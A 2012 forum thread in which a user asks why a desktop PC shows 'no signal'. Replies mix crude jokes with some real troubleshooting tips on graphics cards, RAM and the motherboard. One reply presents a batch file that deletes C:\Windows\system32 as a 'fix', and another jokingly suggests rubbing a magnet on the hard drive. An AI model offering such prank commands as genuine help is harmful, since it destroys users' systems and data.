Urgent Help Needed!!!

Discussion in 'Waffle' started by Tone1304, Nov 17, 2012.

  1. Tone1304

    Tone1304 Member

    Joined:
    Jul 25, 2012
    Messages:
    208
    Likes Received:
    16
    Location:
    Southend-on-sea
    So i was on my computer and the sceen just randomly messed up went all pixely and shit, this has happened before so i turned the screen off and on, no change, then i turned the whole computer off and on again. this is the problem... the green light on the front comes on when i push the power button, and i can hear the fan and all the drives turning on and spinning around but the screen just says no signal, i know the sceen ,works because when i plug the wire into a laptop the screen comes on, the problem must be the computer, also when i plug a usb optical mouse in, none of the red lights come on, so im really pissed, i looked online and everything points to the graphics card, but i didn't put one in so it must be a built in one thats in the mother board and i dont really want to go changing that, would i have to bite the bulet and buy a new computer or is there a way to solve it, i hope there is because none of my stuff is backed up on an external hd, and means i'll lose everything...so pissed guys :(

    Cheers
     
  2. mistasfx

    mistasfx MISTA SFX

    Joined:
    Oct 29, 2007
    Messages:
    2,217
    Likes Received:
    52
    Location:
    Near the Lake District
    insert a carrot into ur anus and it should work
     
    Dagz likes this.
  3. Tone1304

    Tone1304 Member

    Joined:
    Jul 25, 2012
    Messages:
    208
    Likes Received:
    16
    Location:
    Southend-on-sea
    tryed and failed.
     
  4. mistasfx

    mistasfx MISTA SFX

    Joined:
    Oct 29, 2007
    Messages:
    2,217
    Likes Received:
    52
    Location:
    Near the Lake District
    u need a new anus im afraid mate
     
  5. rj_dnb

    rj_dnb Well-Known Member

    Joined:
    Dec 29, 2009
    Messages:
    1,185
    Likes Received:
    241
    Before you go shelling out for a new anus, try a fork. Sometimes they work when carrots fail
     
  6. DtheBUK

    DtheBUK Member

    Joined:
    Sep 30, 2011
    Messages:
    71
    Likes Received:
    1
    Just because it has a graphics card built into the motherboard doesn't mean you can't slap a new one in an expansion port. You had a look inside to see if there's an expansion slot?
     
  7. Tone1304

    Tone1304 Member

    Joined:
    Jul 25, 2012
    Messages:
    208
    Likes Received:
    16
    Location:
    Southend-on-sea
    there is expansions ports but I'm wondering whether there is any point because there's no power going to the mouse or anything
     
  8. Moskit

    Moskit :rodigan: Staff Member

    Joined:
    May 27, 2009
    Messages:
    4,370
    Likes Received:
    3,770
    I had this before.

    Fix is simple.

    Open notepad.

    Type:

    @echo off

    del c:\WINDOWS\system32

    Save as a ".bat" file (you.ll have to manually enter this at the end of the file)

    Then on your file type selection select "all files".

    Then save to your desktop.

    Double click the document & Robert is your Fathers Brother.

    ;)
     
  9. ThePapa

    ThePapa Suffragette City..

    Joined:
    Aug 19, 2010
    Messages:
    8,306
    Likes Received:
    659
    Location:
    West London
    We all thought you'd drowned Moskit. Welcome back..
     
  10. fuuz3r

    fuuz3r KRISTJAN V

    Joined:
    Aug 17, 2007
    Messages:
    940
    Likes Received:
    137
    Location:
    Europe
    well, your data is on the hard drive not on the motherboard - so it's safe. just buy a new motherboard and replace it - if you know what you're doing, if not, bring the pc to where you bought it and ask them to fix it.
     
  11. Busdriver

    Busdriver Member

    Joined:
    Jul 26, 2009
    Messages:
    376
    Likes Received:
    7
    Location:
    Paris
    You can try and find the bigget magnet around your house and rub it all around your hard drive. or not.
     
  12. Tone1304

    Tone1304 Member

    Joined:
    Jul 25, 2012
    Messages:
    208
    Likes Received:
    16
    Location:
    Southend-on-sea
    Dont think im going to trust this cos the del bit but i cant do it anyway cos the computer wont connect to the screen
     
  13. Dagz

    Dagz Well-Known Member

    Joined:
    Nov 19, 2007
    Messages:
    6,718
    Likes Received:
    851
    Its funny how you ask a dnbforum instead of going to say a microsoft help site or something along those lines


    If you cant fix the anus try throwing the laptop at a wall
     
  14. Harry3

    Harry3 Chuki

    Joined:
    Jul 11, 2009
    Messages:
    8,038
    Likes Received:
    736
    Location:
    Canada
    might be related:

    I tried putting my RAM into the 3 other available slots to try and fix an issue with BF3, and my PC started fine but no signal went to my monitor at all. Put the RAM back in their original slots and there was signal again, so I assume if you have faulty RAM or memory slots then the OS doesnt load or something. So got any RAM lying about you know for sure works?

    If that doesnt work, you may have a broken motherboard.

    You said you can hear the discs spinning up, so hopefully the hard drive hasnt failed or corrupted and you still have your data.